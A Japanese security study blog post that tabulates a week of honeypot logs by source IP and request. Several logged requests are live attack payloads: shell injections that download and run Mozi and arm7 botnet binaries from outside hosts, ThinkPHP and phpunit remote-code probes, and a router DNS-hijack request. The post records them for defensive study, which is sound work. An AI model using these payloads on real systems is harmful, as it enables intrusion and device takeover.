家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

Wowhoneypotログ分析（2020/05/23-2020/05/30）

概要

以前の記事で構築したWowhoneypotのログを集計した結果です。

対象期間

2020/05/23-2020/05/30

ログの集計

送信元	内容	検知数
		0
103.113.106.15	\"GET /	1
103.145.12.53	\"GET /	1
103.50.5.230	\"GET /	1
104.248.33.135	\"GET /	1
104.248.92.71	\"GET /	1
106.12.132.21	\"GET /	1
110.154.247.40	\"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	1
110.78.184.241	\"GET /	1
117.169.92.169	\"GET /	1
	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
	\"POST /TP/public/index.php?s=captcha	1
117.254.56.251	\"GET /	1
128.14.134.134	\"GET /	1
128.14.209.178	\"GET /login.html	1
134.175.45.127	\"GET /	1
	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
	\"POST /TP/public/index.php?s=captcha	1
134.19.215.196	\"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	1
136.243.208.164	\"GET /	1
	\"GET //Admin/scripts/setup.php	1
	\"GET //myadmin/scripts/setup.php	2
	\"GET //phpMyAdmin/scripts/setup.php	2
	\"GET //pma/scripts/setup.php	1
	\"GET /muieblackcat	1
139.162.119.197	\"GET /	1
156.96.155.242	\"GET /	1
	\"GET /admin/	1
	\"GET /agSearch/SQlite/main.php	1
	\"GET /dbadmin/	1
	\"GET /HNAP1/	1
	\"GET /hudson/script	1
	\"GET /main.php	1
	\"GET /myadmin/	1
	\"GET /mysql-admin/	1
	\"GET /mysql/	1
	\"GET /mysqladmin/	1
	\"GET /mysqlmanager/	1
	\"GET /openserver/phpmyadmin/	1
	\"GET /p/m/a/	1
	\"GET /php-my-admin/	1
	\"GET /php-myadmin/	1
	\"GET /phpmanager/	1
	\"GET /phpmy-admin/	1
	\"GET /phpMyAdmin-2.2.3/	1
	\"GET /phpMyAdmin-2.2.6/	1
	\"GET /phpMyAdmin-2.5.1/	1
	\"GET /phpMyAdmin-2.5.4/	1
	\"GET /phpMyAdmin-2.5.5-pl1/	1
	\"GET /phpMyAdmin-2.5.5-rc1/	1
	\"GET /phpMyAdmin-2.5.5-rc2/	1
	\"GET /phpMyAdmin-2.5.5/	1
	\"GET /phpMyAdmin-2.5.6-rc1/	1
	\"GET /phpMyAdmin-2.5.6-rc2/	1
	\"GET /phpMyAdmin-2.5.6/	1
	\"GET /phpMyAdmin-2.5.7-pl1/	1
	\"GET /phpMyAdmin-2.5.7/	1
	\"GET /phpMyAdmin-2.6.0-alpha/	1
	\"GET /phpMyAdmin-2.6.0-alpha2/	1
	\"GET /phpMyAdmin-2.6.0-beta1/	1
	\"GET /phpMyAdmin-2.6.0-beta2/	1
	\"GET /phpMyAdmin-2.6.0-pl1/	1
	\"GET /phpMyAdmin-2.6.0-pl2/	1
	\"GET /phpMyAdmin-2.6.0-pl3/	1
	\"GET /phpMyAdmin-2.6.0-rc1/	1
	\"GET /phpMyAdmin-2.6.0-rc2/	1
	\"GET /phpMyAdmin-2.6.0-rc3/	1
	\"GET /phpMyAdmin-2.6.0/	1
	\"GET /phpMyAdmin-2.6.1-pl1/	1
	\"GET /phpMyAdmin-2.6.1-pl2/	1
	\"GET /phpMyAdmin-2.6.1-pl3/	1
	\"GET /phpMyAdmin-2.6.1-rc1/	1
	\"GET /phpMyAdmin-2.6.1-rc2/	1
	\"GET /phpMyAdmin-2.6.1/	1
	\"GET /phpMyAdmin-2.6.2-beta1/	1
	\"GET /phpMyAdmin-2.6.2-pl1/	1
	\"GET /phpMyAdmin-2.6.2-rc1/	2
	\"GET /phpMyAdmin-2.6.2/	1
	\"GET /phpMyAdmin-2.6.3-pl1/	1
	\"GET /phpMyAdmin-2.6.3-rc1/	1
	\"GET /phpMyAdmin-2.6.3/	2
	\"GET /phpMyAdmin-2.6.4-pl1/	1
	\"GET /phpMyAdmin-2.6.4-pl2/	1
	\"GET /phpMyAdmin-2.6.4-pl3/	1
	\"GET /phpMyAdmin-2.6.4-pl4/	1
	\"GET /phpMyAdmin-2.6.4-rc1/	1
	\"GET /phpMyAdmin-2.6.4/	1
	\"GET /phpMyAdmin-2.7.0-beta1/	1
	\"GET /phpMyAdmin-2.7.0-pl1/	1
	\"GET /phpMyAdmin-2.7.0-pl2/	1
	\"GET /phpMyAdmin-2.7.0-rc1/	1
	\"GET /phpMyAdmin-2.7.0/	1
	\"GET /phpMyAdmin-2.8.0-beta1/	1
	\"GET /phpMyAdmin-2.8.0-rc1/	1
	\"GET /phpMyAdmin-2.8.0-rc2/	1
	\"GET /phpMyAdmin-2.8.0.1/	1
	\"GET /phpMyAdmin-2.8.0.2/	1
	\"GET /phpMyAdmin-2.8.0.3/	1
	\"GET /phpMyAdmin-2.8.0.4/	1
	\"GET /phpMyAdmin-2.8.0/	1
	\"GET /phpMyAdmin-2.8.1-rc1/	1
	\"GET /phpMyAdmin-2.8.1/	1
	\"GET /phpMyAdmin-2.8.2/	1
	\"GET /phpMyAdmin-2/	1
	\"GET /phpmyadmin/	2
	\"GET /phpmyadmin2/	2
	\"GET /PMA/	2
	\"GET /PMA2005/	2
	\"GET /script	1
	\"GET /sqlite/main.php	3
	\"GET /SQLiteManager-1.2.4/main.php	1
	\"GET /sqlitemanager/main.php	2
	\"GET /sqlmanager/	1
	\"GET /sqlweb/	1
	\"GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php	1
	\"GET /webadmin/	1
	\"GET /webdb/	1
	\"GET /websql/	1
	\"GET http://www.msftncsi.com/ncsi.txt	1
162.243.136.45	\"GET /portal/redlion	1
162.243.143.101	\"GET /	1
162.243.143.168	\"GET /hudson	1
162.243.145.12	\"GET /	1
172.104.108.109	\"GET /	1
173.249.51.194	\"GET /	1
175.143.116.79	\"GET /	1
176.43.128.2	\"GET /	1
177.38.181.151	\"GET /	1
178.212.49.134	\"GET /	1
178.62.55.19	\"GET /	1
178.73.215.171	\"GET /	1
179.106.102.225	\"GET /	1
181.143.221.68	\"POST /cgi-bin/mainfunction.cgi	1
181.211.255.210	\"GET /	1
183.136.225.46	\"GET /	1
185.10.142.11	\"GET /	1
185.140.160.220	\"GET /	1
185.141.110.143	\"GET /	1
185.156.73.64	\"GET /	2
185.181.52.204	\"GET /	1
185.198.1.105	\"GET /	1
185.216.140.6	\"GET /	1
185.234.219.133	\"GET /	1
185.82.127.47	\"GET /	1
185.82.215.92	\"GET /	1
187.122.189.163	\"GET /	1
187.150.69.49	\"GET /	1
189.113.189.58	\"GET /	1
189.126.64.162	\"GET /	1
189.14.13.52	\"GET /	1
190.94.136.219	\"GET /	1
190.94.148.238	\"GET /	1
190.94.192.8	\"POST /cgi-bin/mainfunction.cgi	1
190.98.213.242	\"GET /	1
191.103.253.25	\"GET /	1
192.227.223.22	\"GET /	1
	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
	\"POST /TP/public/index.php?s=captcha	1
193.118.53.202	\"GET /	1
193.118.53.210	\"GET /	1
194.156.108.13	\"GET /	1
194.208.56.93	\"GET /	1
195.154.94.244	\"GET /	7
195.54.160.123	\"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	2
	\"GET /?XDEBUG_SESSION_START=phpstorm	2
	\"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	2
	\"GET /solr/admin/info/system?wt=json	2
	\"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	1
	\"POST /api/jsonws/invoke	2
	\"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	1
195.54.160.130	\"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	5
	\"GET /?XDEBUG_SESSION_START=phpstorm	5
	\"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	5
	\"GET /solr/admin/info/system?wt=json	5
	\"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	1
	\"POST /api/jsonws/invoke	5
	\"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	1
196.46.187.14	\"GET /	1
196.52.43.117	\"GET /	1
196.52.43.63	\"GET /	1
196.52.43.98	\"GET /	1
198.108.66.202	\"GET /	1
198.108.66.246	\"GET /	1
198.162.202.253	\"GET /	1
198.199.73.101	\"GET /admin/connection/	1
	\"GET /favicon.ico	1
200.141.135.218	\"GET /	1
201.171.46.39	\"POST /cgi-bin/mainfunction.cgi	1
201.76.114.32	\"GET /	1
202.51.180.250	\"GET /	1
207.148.15.205	\"GET /	1
209.17.96.122	\"GET /	1
209.17.96.138	\"GET /	1
209.17.96.194	\"GET /	1
209.17.96.210	\"GET /	1
209.17.96.58	\"GET /	1
209.17.96.82	\"GET /	2
209.17.97.114	\"GET /	1
209.17.97.2	\"GET /	1
209.97.190.223	\"GET /	1
212.125.26.105	\"GET /	1
212.200.108.225	\"GET /	1
212.90.181.254	\"GET /	1
213.109.235.252	\"GET /	1
213.153.167.87	\"GET /	1
220.248.49.230	\"GET /TP/public/index.php	1
222.10.33.175	\"GET /operator/basic.shtml?id=1337	1
	\"GET /sess-bin/login_session.cgi	2
	\"GET /setup.cgi	1
	\"GET /shell?/bin/busybox+ABCD	2
	\"POST /doLogin	1
23.31.209.205	\"POST /cgi-bin/mainfunction.cgi	1
34.76.17.151	\"GET /	1
35.196.251.88	\"GET /bc9615d267dba809638d9fbc9eb55236.php	1
	\"GET /D90A75ABEFF190F2A31DA59546864E43.php	1
	\"GET /dbf772166781764452a2d50883ed1d63.php	1
	\"GET /phpmyadmin/index.php	2
37.119.104.59	\"GET /adv	1
39.104.130.149	\"GET /	2
	\"GET //navigation.html	1
	\"GET /Css/Pictures/Login/LoginContent.png	1
	\"GET /image/lgbg.jpg	1
	\"GET /images/login/login_01.jpg	1
	\"GET /images/logo.png	1
	\"GET /info/SYSTEM/_Application.htm	2
	\"GET /server.js	1
39.104.142.189	\"POST /onvif/device_service	1
47.89.192.12	\"GET /	1
47.96.114.93	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
5.101.0.209	\"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	3
	\"GET /?XDEBUG_SESSION_START=phpstorm	3
	\"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	3
	\"GET /solr/admin/info/system?wt=json	3
	\"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	3
	\"POST /api/jsonws/invoke	3
	\"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	3
5.32.176.117	\"GET /	1
5.58.14.24	\"GET /	1
51.159.71.63	\"GET /	2
	\"GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1	1
51.254.59.113	\"GET /	1
52.232.188.182	\"GET /	1
54.173.153.105	\"GET /	1
59.8.227.74	\"GET /	3
61.70.132.192	\"GET /	2
62.5.156.153	\"GET /	1
71.6.232.4	\"GET /	1
77.57.58.179	\"GET /	1
78.187.193.68	\"GET /	1
80.80.150.41	\"GET /	1
80.82.68.60	\"GET /	1
	\"GET /favicon.ico	1
	\"GET /robots.txt	1
80.82.70.118	\"GET /	2
81.211.44.50	\"GET /	1
82.55.240.23	\"GET /adv	1
82.62.97.143	\"GET /	5
89.168.181.138	\"GET /	1
89.218.249.86	\"GET /	1
89.240.158.102	\"GET /	1
89.36.211.92	\"GET /	1
91.222.108.56	\"GET /	1
91.232.157.226	\"GET /	1
91.236.177.162	\"GET /	2
92.118.161.21	\"GET /	1
94.242.57.16	\"HEAD /	1
95.5.252.227	\"GET /	1

コメント

この期間では「GET /manager/html」を検知しなかった。（前の期間では784回）
家庭用ルータに対するDNSサーバの書き換えを狙った攻撃を確認。
\"GET /dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1

また、上記に含まれるIPアドレスはVirusTotalでも悪性のアドレスとして報告されている。

www.virustotal.com

securelist.com